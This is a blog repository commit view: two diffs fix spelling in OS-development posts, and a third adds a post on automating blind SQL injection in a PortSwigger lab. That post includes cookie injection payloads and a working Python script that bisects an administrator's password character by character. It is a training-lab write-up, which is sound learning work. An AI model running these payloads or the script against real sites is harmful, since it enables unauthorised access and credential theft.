Fix spelling errors in first posts (yikes).

Blind SQL Injection Post
2024-01-23 23:14:03 -08:00 · 2024-01-23 23:08:02 -08:00
3 changed files with 243 additions and 17 deletions
--- a/content/blog/2023/12/acadia-0.1.0/index.md
+++ b/content/blog/2023/12/acadia-0.1.0/index.md
@ -111,13 +111,14 @@ On top of the things mentioned above, we use the limine protocol to:
 Following boot we immediately initialize the global descriptor table (GDT) and
 interrupt descriptor table (IDT). The **GDT** is mostly irrelevant for x86-64,
 however it was interesting trying to get it to work with the sysret instruction
-which expects two copies of the user-space segment descriptors to allow returing
-to 32bit code from a 64 bit OS. Right now the system doesn't support 32 bit code
-(and likely never will) so we just duplicate the 64 bit code segment.
+which expects two copies of the user-space segment descriptors to allow
+returning to 32bit code from a 64 bit OS. Right now the system doesn't support
+32 bit code (and likely never will) so we just duplicate the 64 bit code
+segment.

 The **IDT** is fairly straightforward and barebones for now. I slowly add more
 debugging information to faults as I run into them and it is useful. One of the
-biggest improvements was setting up a seperate kernel stack for Page Faults and
+biggest improvements was setting up a separate kernel stack for Page Faults and
 General Protection Faults. That way if I broke memory related to the current
 stack frame I get useful debugging information rather than an immediate triple
 fault. I also recently added some very sloppy stack unwind code so I can more
@ -153,9 +154,9 @@ earlier than they need to be it is obvious because things break.

 For **virtual memory management** I keep the higher half (kernel) mappings
 identical in each address space. Most of the kernel mappings are already
-availble from the bootloader but some are added for heaps and additional stacks.
+available from the bootloader but some are added for heaps and additional stacks.
 For user memory we maintain a tree of the mapped in objects to ensure that none
-intersect. Right now the tree is innefficient because it doesn't self balance
+intersect. Right now the tree is inefficient because it doesn't self balance
 and most objects are inserted in ascending order (i.e. it is essentially a
 linked list).

@ -213,7 +214,7 @@ The kernel provides APIs to:
 * Allocate memory and map it into an address space.
 * Communicate with other processes using Endpoints, Ports, and Channels.
 * Register IRQ handlers.
-* Manage Capabilites.
+* Manage Capabilities.
 * Print debug information to the VM output.

 ### IPC
--- a/content/blog/2024/01/ahci-driver/index.md
+++ b/content/blog/2024/01/ahci-driver/index.md
@ -110,7 +110,7 @@ The short story is that we are looking for the device with the right [class
 code](https://wiki.osdev.org/PCI#Class_Codes) - Class Code 0x1 (Storage Device),
 Subclass 0x6 (SATA Controller), Subtype 0x1 (AHCI).

-Once we have the correct configuration space we cn read the address at offset
+Once we have the correct configuration space we can read the address at offset
 0x24 (called the ABAR for AHCI Base Address) which points to the start of the
 GHC registers.

@ -319,7 +319,7 @@ type and any errors from the interrupt since we aren't sending any commands.

 Something I'm not sure about is that as soon as we enable interrupts we seem to
 receive a FIS from the device with an error bit set. Both the hard drive and the
-optical drive on qemu send a FIS with error bit 0x1 set. Additionally the status
+optical drive on QEMU send a FIS with error bit 0x1 set. Additionally the status
 field is set to 0x30 for the hard drive and 0x70 for the optical drive. 

 I was able to find a [OSDev Forum
@ -328,7 +328,7 @@ referencing that this behavior is caused by the reset sending an EXECUTE DEVICE
 DIAGNOSTIC command (0x90) to the device. It notes that this is largely
 undocumented behavior but at least this information offers some clarity on the
 outputs. Reading the ATA Command Set section 7.9.4 we can see that the command
-ouputs code 0x01 to the error bits when `Device 0 passed, Device 1 passed or not
+outputs code 0x01 to the error bits when `Device 0 passed, Device 1 passed or not
 present`. According to a footnote we can "See the appropriate transport standard
 for the definition of device 0 and device 1." I really thought I was already
 looking at the "appropriate transport standard" but alas. All that to say we'll
@ -340,7 +340,7 @@ Now that the AHCI ports are initialized and can handle an interrupt, we can send
 commands to them. To start with let's send the IDENTIFY DEVICE command to each
 device. This command asks the device to send 512 bytes of information about
 itself back to us. These bytes contain 40 years of certified-crufty backwards
-compatability. I mean just feast your eyes on the number of retired and obsolete
+compatibility. I mean just feast your eyes on the number of retired and obsolete
 fields in just the first page of the spec.

 ![IDENTIFY DEVICE Response](images/IDENTIFY_DEVICE.png)
@ -350,7 +350,7 @@ and sector count from the drive. To do so we need to figure out how to send a
 command to the device. To be honest I feel like the specs fall down here in
 actually explaining this. The trick is to send a Register Host to Device FIS in one
 of the command slots. This FIS type has a field for the command as well as some
-common parameters such as lba and count. In retrospect it is fairly clear once
+common parameters such as LBA and count. In retrospect it is fairly clear once
 you are aware of it, but if you are just reading the SATA spec and looking at
 the possible commands, making the logical jump to the Register Host To Device
 FIS feels damn near impossible.
@ -379,7 +379,7 @@ Device FIS is as follows:
 ![Register Host to Device FIS Layout](images/RegisterHostToDeviceFIS.png)    

 We don't need to initialize most of the fields here because the IDENTIFY_DEVICE
-call doesn't rely on an lba or sector count. One of the keys is setting the high
+call doesn't rely on an LBA or sector count. One of the keys is setting the high
 bit "C" in the byte that contains PM Port which indicates to the HBA that this
 FIS contains a new command (I spent a while trying to figure out why this wasn't
 working without that). The code for this is relatively straightforward.
@ -429,9 +429,9 @@ port_struct_->command_issue |= (1 << slot);
 ```

 But wait! How will we know when this command has completed? We somehow need to
-wait until we receive an interrupt for this command to proccess the data it
+wait until we receive an interrupt for this command to process the data it
 sent. To handle this we can add a semaphore for each port command slot to allow
-signalling when we recieve a completion interrupt for that command. I think it
+signalling when we receive a completion interrupt for that command. I think it
 might make sense to have some sort of callback instead so we can pass errors
 back to the caller instead of just a completion signal. However I'm not sure
 what type of errors exist that are resolvable by the caller so for now this
@ -469,7 +469,7 @@ void AhciPort::HandleIrq() {
 }
 ```

-Ok now that we have retrieved the information from the drive we can parse it.
+OK now that we have retrieved the information from the drive we can parse it.
 For the sector size, the default is 512 bytes which we will use unless the
 `LOGICAL SECTOR SIZE SUPPORTED` bit is set in double word 106, bit 12. If that
 is set we can check the double words at 117 and 118 to get the 32 bit sector
@ -531,7 +531,7 @@ that truly only a mother could love:

 ![Register Host to Device Layout LBA](images/RegisterHostToDeviceFISLBA.png)

-That asside we simply update the FIS construction to set the command, LBA, and
+That aside we simply update the FIS construction to set the command, LBA, and
 sector count. Following that we set the PRDT values (although we still only use
 one slot).

--- a/content/blog/2024/01/blind-sqli-automation/index.md
+++ b/content/blog/2024/01/blind-sqli-automation/index.md
@ -0,0 +1,225 @@
+---
+title: "Automating Blind SQL Injection on Cookies"
+date: 2024-01-23
+---
+
+Earlier this evening, I was working through one of the [PortSwigger SQL
+injection
+labs](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses)
+which requires you to determine an administrator password by injecting some SQL
+into a cookie and checking if the content of the page changes because a
+resulting query succeeded or failed.
+
+## The attack
+
+Basically say you have a cookie `TrackingId` with a value like
+`nCoQWoq8E7c6vj1o` and the page runs a query like `SELECT ... FROM trackers
+WHERE id = 'nCoQWoq8E7c6vj1o'` and inserts a "Welcome back!" banner onto the
+page if the query returns a row and doesn't if it returns nothing.
+
+This means you can get creative with the value of the cookie to do some SQL
+injection and use the boolean output (either the banner displays or it doesn't)
+to extract information.
+
+To validate that there is a SQL injection path available you can try the
+following two values for the cookie:
+
+```markdown
+nCoQWoq8E7c6vj1o' AND '1'='1
+nCoQWoq8E7c6vj1o' AND '1'='0
+```
+
+This transforms the query from something like this:
+
+```sql
+SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o';
+```
+
+Into your modified query:
+
+```sql
+SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND '1'='0';
+```
+
+Now this might not seem very useful off the bat but you can extract a lot of
+information out of the database this way. Consider the following query.
+
+```sql
+SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND
+  (SELECT password FROM users WHERE username = 'administrator') = 'hunter2';
+```
+
+If the "Welcome back!" banner displayed on the site you would know that you
+had properly guessed the admin password because the condition evaluated to true.
+This isn't any more helpful than just trying to brute force the password on
+the login page (other than maybe bypassing some rate limits and monitoring).
+But what you can do to speed this up is to guess one character at a time,
+and you can bisect the character range while you're at it. Consider the
+following three queries
+(borrowed directly from the [PortSwigger
+tutorial](https://portswigger.net/web-security/sql-injection/blind)).
+
+```sql
+-- This succeeds
+SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
+  (SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 'm';
+
+-- This fails
+SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
+  (SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 't';
+ 
+-- This succeeds
+SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
+  (SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's';
+```
+
+We now know the first letter of the administrator password is 's'!
+
+Looking directly at the cookie values they were as follows:
+
+```markdown
+nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 'm
+nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 't
+nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's
+```
+
+This is a pretty nifty attack that lets us systematically derive the
+administrator's password.
+
+## The Problem
+
+Happily, I got to work on the lab and started bisecting each character of the
+administrator's password. The issue was that by the time I had done this for 5
+characters I was desperately hoping the password was only 5 characters long.
+I had the same thought at 8 characters, 10 characters, and 16 characters. This
+process was incredibly tedious and involved refreshing the page, updating the
+cookie info based on what I had just learned, saving the cookie, and refreshing
+the page again.
+
+Obviously there had to be a better way, but because I kept feeling like I was
+just around the corner from cracking it I ended up powering through all 20
+characters of the password. 20! This took me well over 30 minutes I think.
+
+Clearly, this sort of repetitive work is something that should be automated.
+
+## The Solution
+
+So let's take a crack at this using the Python `requests` library (mainly
+because it is the one I've used in the past). Let's start by simply getting the
+page as is:
+
+```python
+import requests
+url = "https://{SOME_HEX_ID}.web-security-academy.net/"
+r = requests.get(url)
+print(r.status_code)
+print(r.text)
+```
+
+And voilà it works! At least we don't have to pretend we're a browser or
+something to get the page properly. Next up let's try to get the "Welcome back!"
+banner.
+
+```python
+cookies = {
+    "TrackingId": "CjAZljYSS9X1ZfRg",
+}
+r = requests.get(url, cookies=cookies)
+```
+
+Incredibly this also works on the first try! Now let's generalize this into a
+function that tells us whether a specific cookie gets a good response or not.
+
+```python
+import sys
+
+import requests
+
+
+def injection_works(inject_str):
+    url = "https://0a0400cc04bd096f82089e9e005900a9.web-security-academy.net/"
+    cookies = {
+        "TrackingId": f"CjAZljYSS9X1ZfRg{inject_str}",
+    }
+    r = requests.get(url, cookies=cookies)
+    if r.status_code != 200:
+        print(r.status_code)
+        print(r.text)
+        sys.exit("Request failed")
+    return "Welcome back!" in r.text
+
+
+if __name__ == "__main__":
+    print(injection_works(""))
+```
+
+For the purposes of this we can just match the exact string in the response
+text; we don't need to actually parse it using Beautiful Soup or something.
+
+Now we can use this function to bisect the first character like so:
+
+```python
+import time
+
+
+def determine_character(char_num):
+    # Parentheses let Python join the adjacent string literals across lines.
+    base_inj_str = (
+        "' AND SUBSTRING("
+        "(SELECT password FROM users WHERE username = 'administrator'), {}, 1) < '{}"
+    )
+    # There has got to be a cleaner way to do this right?
+    base_charset = "0123456789abcdefghijklmnopqrstuvwxyz"
+    charset = base_charset[:]
+    while len(charset) > 1:
+        mid_char_num = len(charset) // 2
+        mid_char = charset[mid_char_num]
+        inj_str = base_inj_str.format(char_num, mid_char)
+        if injection_works(inj_str):
+            # The character is less than our midpoint.
+            charset = charset[:mid_char_num]
+        else:
+            # The character is greater than or equal to our midpoint.
+            charset = charset[mid_char_num:]
+        time.sleep(1)
+        print(charset)
+    return charset[0]
+
+if __name__ == "__main__":
+    print(determine_character(1))
+```
+
+This successfully identifies the first character in the administrator password as
+'1'.
+
+Finally we just need to do this iteratively until we reach the end of the
+password. While doing this manually I learned that when you take a substring
+outside of a string's length in MySQL it just returns an empty string. Let's add
+a case to detect that before trying to bisect a character, because as I
+learned annoyingly the first time around, the empty string will always compare
+as less than a single character. We can use that to our advantage however and
+simply test whether the string is less than a character we know we won't
+see (as we know the password is lowercase alphanumeric) like '!', which sorts
+before every digit and letter, so only the empty string compares as less than it.
+
+```python
+def determine_character(char_num):
+    base_inj_str = (
+        "' AND SUBSTRING("
+        "(SELECT password FROM users WHERE username = 'administrator'), {}, 1) < '{}"
+    )
+    base_charset = "0123456789abcdefghijklmnopqrstuvwxyz"
+    if injection_works(base_inj_str.format(char_num, '!')):
+        return None
+    ...
+```
+
+Then in the main function we can use an [assignment
+expression](https://peps.python.org/pep-0572/) to loop until the function
+returns None.
+
+```python
+if __name__ == "__main__":
+    char_num = 1
+    password = ""
+    while char := determine_character(char_num):
+        password += char
+        char_num += 1
+    print(password)
+```
+
+And this worked on the first try! It got the password in around 3 minutes
+(mainly hampered by the slow response time of the server but I didn't want to
+hammer the kind people at PortSwigger by parallelizing this). And all told this
+took me just over 50 minutes to write (including this blog post though). And
+while that was slightly longer than the time it took me to do this manually it
+was wayyyy less tedious and it's repeatable!
+
+Overall, I found this very enjoyable as I have played with SQL injections in the
+past but I haven't tried to automate anything around it and this was a cool
+opportunity to do that.
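
The bisection and end-of-password check described in the new post can be tried without touching the lab server. The following is a minimal offline sketch, not the post's actual script: `make_oracle`, `is_less_than`, `recover`, and `CHARSET` are hypothetical names, the secret is made up, and the oracle is a local stand-in that answers the same "is the character at this position less than X?" question that `injection_works` answers over HTTP. It assumes the target compares characters in ASCII order, as Python does.

```python
import string

# Digits sort before lowercase letters in ASCII, so this string is already sorted.
CHARSET = string.digits + string.ascii_lowercase


def make_oracle(secret):
    """Hypothetical local stand-in for the post's injection_works()."""
    calls = {"count": 0}

    def is_less_than(pos, candidate):
        calls["count"] += 1
        # Slicing past the end yields "", mirroring SUBSTRING past the end,
        # and "" compares as less than any single character.
        return secret[pos - 1:pos] < candidate

    return is_less_than, calls


def determine_character(is_less_than, pos):
    # '!' sorts before every charset member, so only "" is less than it.
    if is_less_than(pos, "!"):
        return None
    lo, hi = 0, len(CHARSET)  # the answer is somewhere in CHARSET[lo:hi]
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if is_less_than(pos, CHARSET[mid]):
            hi = mid  # character is below the midpoint
        else:
            lo = mid  # character is at or above the midpoint
    return CHARSET[lo]


def recover(is_less_than):
    found = []
    pos = 1  # SQL SUBSTRING positions are 1-based
    while (char := determine_character(is_less_than, pos)) is not None:
        found.append(char)
        pos += 1
    return "".join(found)


if __name__ == "__main__":
    oracle, calls = make_oracle("s3cr3tw0rd")
    print(recover(oracle), calls["count"])
```

Tracking index bounds instead of re-slicing the charset keeps the loop invariant explicit, and counting oracle calls gives a rough idea of how many requests a real run would send: at most seven per character here, including the end-of-password check.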
Author	SHA1	Message	Date
Drew Galbraith	80e734855c	Fix spelling errors in first posts (yikes).	2024-01-23 23:14:03 -08:00
Drew Galbraith	adeb3cf394	Blind SQL Injection Post	2024-01-23 23:08:02 -08:00